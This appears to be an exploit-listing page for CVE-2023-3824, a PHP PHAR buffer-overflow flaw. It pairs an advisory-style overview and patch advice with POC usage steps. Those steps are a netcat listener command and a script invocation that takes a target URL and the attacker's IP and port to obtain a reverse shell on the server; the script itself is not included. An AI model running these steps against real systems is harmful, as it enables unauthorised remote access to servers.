Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Php CVE-2023-3824

## https://sploitus.com/exploit?id=36B375A7-A530-57D3-8991-D4671A14F8AA
# About


CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.

## Exploitation Overview

- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.

## Exploit Example

The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.

A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.

## Mitigation

- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.

This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.

# POC

Run reverse shell listener:

```bash
nc -l local_port
```

Then run POC:

```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```

* _remote_url_ is vulnerable remote php script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is an attacker machine IP 
* _local_port_ is an attacker machine port

If the exploit succeeds, you'll get the shell with the server's (apache, nginx) permissions.

---

---

```text


                                                        .--,-``-.             
                                             ,---,     /   /     '.           
  ,---,                                    ,--.' |    / ../        ;          
,---.'|                                    |  |  :    \ ``\  .`-    '  __  ,-.
|   | :                           .--.--.  :  :  :     \___\/   \   :,' ,'/ /|
:   : :      ,--.--.     ,---.   /  /    ' :  |  |,--.      \   :   |'  | |' |
:     |,-.  /       \   /     \ |  :  /`./ |  :  '   |      /  /   / |  |   ,'
|   : '  | .--.  .-. | /    /  ||  :  ;_   |  |   /' :      \  \   \ '  :  /  
|   |  / :  \__\/: . ..    ' / | \  \    `.'  :  | | |  ___ /   :   ||  | '   
'   : |: |  ," .--.; |'   ;   /|  `----.   \  |  ' | : /   /\   /   :;  : |   
|   | '/ : /  /  ,.  |'   |  / | /  /`--'  /  :  :_:,'/ ,,/  ',-    .|  , ;   
|   :    |;  :   .'   \   :    |'--'.     /|  | ,'    \ ''\        ;  ---'    
/    \  / |  ,     .-./\   \  /   `--'---' `--''       \   \     .'           
`-'----'   `--`---'     `----'                          `--`-,,-'             
```

---
inspired by ::PerfectForms::